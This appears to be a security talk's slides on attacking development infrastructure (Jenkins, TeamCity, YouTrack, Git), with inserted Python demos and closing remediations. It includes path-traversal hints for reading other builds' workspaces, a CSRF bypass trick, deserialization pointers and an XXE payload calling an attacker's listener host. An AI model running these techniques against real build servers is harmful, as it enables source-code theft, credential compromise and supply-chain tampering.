The talk will be about modern development infrastructure from an attacker's perspective. As we all know, developers rule the software world. Therefore, whoever gains control of the development infrastructure controls the software, and thus its users.
In the talk, we'll cover a number of attack scenarios against that infrastructure (repositories, CI tools, bug trackers etc.) using simple (or sometimes not so simple) security bugs. We'll also list the most valuable targets inside a development environment.
7. Components: IDE
An integrated development environment (IDE) is a software application that
provides comprehensive facilities to computer programmers for software
development. An IDE normally consists of a source code editor, build
automation tools and a debugger. Most modern IDEs have intelligent code
completion. (c) Wikipedia
● Consumes user input
● Produces sources
● Builds sources
● Uses plugins for integration with other tools
● Has UI
● Can be the target of an attack (even the IDE!)
Example
JetBrains IntelliJ-based IDEs were prone to a CSRF vulnerability that allowed
an attacker to access the local file system from a malicious website.
JetBrains' advisory: https://blog.jetbrains.com/blog/2016/05/11/security-update-for-intellij-based-ides-v2016-1-and-older-versions/
10. Components: Version control
A component of software configuration management, version control, also
known as revision control or source control, is the management of changes to
documents, computer programs, large web sites, and other collections of
information.
● Stores user-supplied data (not always trusted)
● Uses plugins for integration with other tools
● Has UI
● Will be the target of attack
Example
A number of CVEs and other vulns in:
● Git itself
● Git-based repository hosting (GitLab, GitHub etc.)
The same goes for the less popular Mercurial and SVN.
12. Components: CI system
Continuous integration (CI) is the practice, in software engineering, of merging
all developer working copies to a shared mainline several times a day.
● Stores user-supplied data (not always trusted)
● Executes (!) user-supplied data
● Stores credentials and other identity data
● Has UI
● The most likely target of attack
15. Components: Issue trackers
An issue tracking system (also ITS, trouble ticket system, support ticket,
request management or incident ticket system) is a computer software
package that manages and maintains lists of issues, as needed by an
organization.
● Stores user-supplied data (not always trusted)
● Has UI
● Will probably be the target of attack
Example
A number of CVEs and other vulns in various issue tracking systems:
● The latest XXE vulnerability in JetBrains YouTrack, as an example of a
common web bug:
http://blog.jetbrains.com/youtrack/2016/02/important-youtrack-6-5-17031-update/
● A more entertaining example, CVE-2015-4499 in Bugzilla, which allows
escalation of privileges via improper validation of e-mail addresses:
https://blog.perimeterx.com/bugzilla-cve-2015-4499/
16. Why so valuable?
1. Directly affects the source code of your product
2. Works with the developer's identity
3. Can be a great help to an attacker during network infiltration
17. Goodies: Source code
1. The source code itself
   Can be stolen
2. Your application's end users
   Can be infected
18. Goodies: Developer's identity
● Your private (signing) key
Signing malicious code with your keys allows:
● Evading antiviruses
● Circumventing several security mechanisms on some OSes (like iOS)
19. Goodies: Network infiltration
● Elevation of privilege
○ Domain credentials
○ Service credentials
○ SSH keys
○ ...
● Malicious code execution -> full access to your network
20. Goodies: Summary
Based on the previous slides, we have the following types of goodies:
● Source code
● Developer's identity
● Credentials used on the network
● Code execution (e.g. backend access)
21. Attack surface? Where to look
Matrix of goodies per component (rows: components, columns: goodies, as
listed on the previous slides; the axis labels are not preserved in this text
version):
+   +   +    -
+   +   -    -
+   +   +++  +
-   -   +    -
Actually, not in scope =)
Disclaimer
The information below is based on my own experience with dev tools and
may or may not match your own knowledge.
Also, the distribution of goodies between components is based on my
understanding of how each component should work.
24. Attack surface? The keys to pwn the components
User Interface
● Graphical (mostly web-based) interface to control the Master
● (sometimes) APIs and other such stuff
Actually, each component has one
25. Attack surface? The keys to pwn the components
Plugins
● Various tools to modify the base system, such as:
○ Security plugins
○ Integration plugins
○ Reporting plugins
○ ...
With all this integration stuff, it is very likely that a component has the
ability to use plugins
31. Common configuration problems*
● Vulnerable instances (often with public exploits)
● Default credentials (or their absence)
● Build tools running under highly privileged accounts (root or SYSTEM)
● No (or bad) role management
● No sandboxing (isolation)
*based on observations from various pentests
33. A Note on isolation of builds
● No isolation on build servers
○ It is possible to access the sources of other projects
○ On the Master, it is possible to access the server configuration itself
Just pass a relative path like this to your build script:
Agent working directories (other projects' sources):
../workspace/ - Jenkins agent's working dir
../../work/ (buildAgent/work/) - TeamCity agent's working dir
Master configuration directories:
$JENKINS_HOME/ - Jenkins configuration dir
.BuildServer/config/ - TeamCity configuration dir
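To see what the lack of isolation above actually gives a build step, here is an added example (not from the talk or from Jenkins/TeamCity): a small audit that, run from inside a job's working directory, lists the sibling workspaces it can read through `../`, and a function doing what a malicious build step would do with that. The `workspace/<job>` layout mimics a Jenkins agent; the job names and the `settings.py` content are constructed for the demo and created in a temp directory, so nothing on a real agent is touched.

```python
import os
import tempfile


def exposed_siblings(build_dir):
    """Return names of sibling project directories that a build running in
    build_dir can list via '../<other job>/'. An empty list means the agent
    at least hides other workspaces from this build."""
    real = os.path.realpath(build_dir)
    parent, me = os.path.dirname(real), os.path.basename(real)
    exposed = []
    for name in sorted(os.listdir(parent)):
        path = os.path.join(parent, name)
        if name == me or not os.path.isdir(path):
            continue
        try:
            os.listdir(path)          # can we actually read the other workspace?
        except PermissionError:
            continue
        exposed.append(name)
    return exposed


def steal_sibling_files(build_dir, sibling):
    """What a malicious build step would do next: walk ../<sibling>/ and
    collect every file path relative to that workspace."""
    target = os.path.join(build_dir, os.pardir, sibling)
    found = []
    for dirpath, _dirs, files in os.walk(target):
        for fn in files:
            found.append(os.path.relpath(os.path.join(dirpath, fn), target))
    return sorted(found)


def make_demo_layout():
    """Constructed, Jenkins-like agent layout in a temp dir:
    <root>/workspace/<job>/ for two invented jobs, one of them holding a
    constructed config file. Returns the 'attacker' job's directory."""
    root = tempfile.mkdtemp(prefix="agent-")
    ws = os.path.join(root, "workspace")
    for job in ("evil-pr-build", "payments-backend"):
        os.makedirs(os.path.join(ws, job))
    with open(os.path.join(ws, "payments-backend", "settings.py"), "w") as f:
        f.write("DB_PASSWORD = 'constructed-secret'\n")
    return os.path.join(ws, "evil-pr-build")


if __name__ == "__main__":
    mine = make_demo_layout()
    for name in exposed_siblings(mine):
        print(name, "is readable from", mine, "->", steal_sibling_files(mine, name))
```

Dropping `exposed_siblings(os.getcwd())` into a throwaway build step is a quick way to check your own agents: any non-empty result means builds share a filesystem view and the remediation on the last slide (isolating projects, e.g. one container per build) applies.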
34. Bugs Bugs Bugs!!!
Jenkins. A number of XSS vectors misusing Jenkins functionality:
- Custom web server for user-supplied data: /userContent/
- HTML content from code repos, served from the job workspace: /job/<ProjectName>/ws/
Exploit: link
35. Bugs Bugs Bugs!!!
Jenkins universal CSRF
CVE-2015-7538
Exploit: change the Content-Type of any request to multipart/form-data and
the crumb check is skipped.
The vulnerable check in Jenkins' CrumbFilter (the multipart exemption is the bug):
if (valid || isMultipart(httpRequest)) {
    // crumb valid, or multipart body: pass the request through unchecked
    chain.doFilter(request, response);
} else {
    LOGGER.log(Level.WARNING, "No valid crumb was included in request for {0}. Returning {1}.",
            new Object[] {httpRequest.getRequestURI(), HttpServletResponse.SC_FORBIDDEN});
    // ... request rejected with 403
}
36. Bugs Bugs Bugs!!!
The notorious Java deserialization vulnerability in the Jenkins CLI (command line interface)
CVE-2015-8103
Affected library: ./webapps/ROOT/WEB-INF/lib/commons-collections-3.2.1.jar
Details and exploit: "What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your
Application Have in Common? This Vulnerability" by FoxGlove Security
Payload generator: https://github.com/frohoff/ysoserial
37. Bugs Bugs Bugs!!!
Notorious Java deserialization in Jenkins' XStream parsing
CVE-2016-0792
Details and exploit: "Serialization Must Die: Act 2: XStream (Jenkins CVE-2016-0792)"
by Contrast Security
38. Bugs Bugs Bugs!!!
TeamCity privilege escalation through IDOR
CVE-2015-1313
/registerUserSubmit.html is accessible even if registration is turned off in
the configuration
Details and exploit at: https://beyondbinary.io/articles/teamcity-account-creation/
39. Bugs Bugs Bugs!!!
YouTrack XXE in the user import function
Details: bo0om's blog + HackerOne report 114476 (sadly, both in Russian)
Exploit: send an XML payload via the PUT method to the URI /rest/import/users?{test}
Example payload (the entity's URL points at an attacker-controlled host, so a
request arriving there confirms the XXE out of band):
<?xml version="1.0"?>
<!DOCTYPE list [
<!ENTITY % xxe SYSTEM "http://myserver/xxe-test">
%xxe;
]>
<list></list>
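What the payload does inside a parser, and how an import endpoint should treat it, as an added example (not YouTrack's code): the payload from the slide is fed to Python's expat with parameter-entity expansion switched on (the behaviour the vulnerable importer had) and off; a handler records the URL the parser tries to resolve instead of fetching it, so nothing talks to the network. The hardened `safe_import` refuses any document with a DOCTYPE before parsing, which is the usual fix when the import format has no legitimate use for one. `http://myserver/xxe-test` is the listener from the slide, not a real host.

```python
import xml.parsers.expat as expat

# Payload from the slide; the SYSTEM URL is the attacker's listener. It is
# never contacted here: the handler below only records it.
PAYLOAD = (b'<?xml version="1.0"?>\n'
           b'<!DOCTYPE list [\n'
           b'<!ENTITY % xxe SYSTEM "http://myserver/xxe-test">\n'
           b'%xxe;\n'
           b']>\n'
           b'<list></list>')


def external_fetches(xml_bytes, resolve_external):
    """Parse xml_bytes with expat and return the external system IDs the
    parser asked to resolve. resolve_external=True expands parameter
    entities like the vulnerable importer did; False is the safe setting."""
    fetched = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS
                                 if resolve_external
                                 else expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_external_entity(context, base, system_id, public_id):
        fetched.append(system_id)   # this is the out-of-band callback target
        return 1                    # tell expat we handled it; fetch nothing

    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_bytes, True)
    return fetched


def has_doctype(xml_bytes):
    """Cheap pre-check for an import endpoint: does the document carry a
    DOCTYPE (and therefore possibly entity declarations) at all?"""
    seen = []
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = (
        lambda name, sysid, pubid, has_internal: seen.append(name))
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError:
        pass                        # malformed input: report what we saw
    return bool(seen)


def safe_import(xml_bytes):
    """Hardened import: reject DOCTYPEs, parse with external entity
    resolution disabled, and return the element names seen."""
    if has_doctype(xml_bytes):
        raise ValueError("DOCTYPE not allowed in import data")
    names = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_bytes, True)
    return names


if __name__ == "__main__":
    print("vulnerable parser would fetch:", external_fetches(PAYLOAD, True))
    print("hardened parser fetches:      ", external_fetches(PAYLOAD, False))
    print("import of benign document:    ", safe_import(b"<list><user/></list>"))
```

Expat never fetches external entities by itself; it only hands the URL to the application's handler. Parsers that resolve `SYSTEM` identifiers automatically (most Java XML stacks with default settings) are where this payload turns into a real HTTP request, which is why the blind callback in the slide works as a detection technique.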
45. Exploitation
● Network infiltration
○ Gaining credentials
E.g. from local encrypted storage
For Jenkins: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html -
retrieving the encryption key via the admin script console
○ Gaining backend access
55. Remediations. Summary
● Never rely on default settings
● Never bind to 0.0.0.0 (expose management interfaces only where they are needed)
● Never rely on the safety of 3rd-party components like plugins
● Update your tools as soon as a new security advisory is published
● Perform additional validation on all user inputs (including sources)
● Try to isolate projects (Docker?)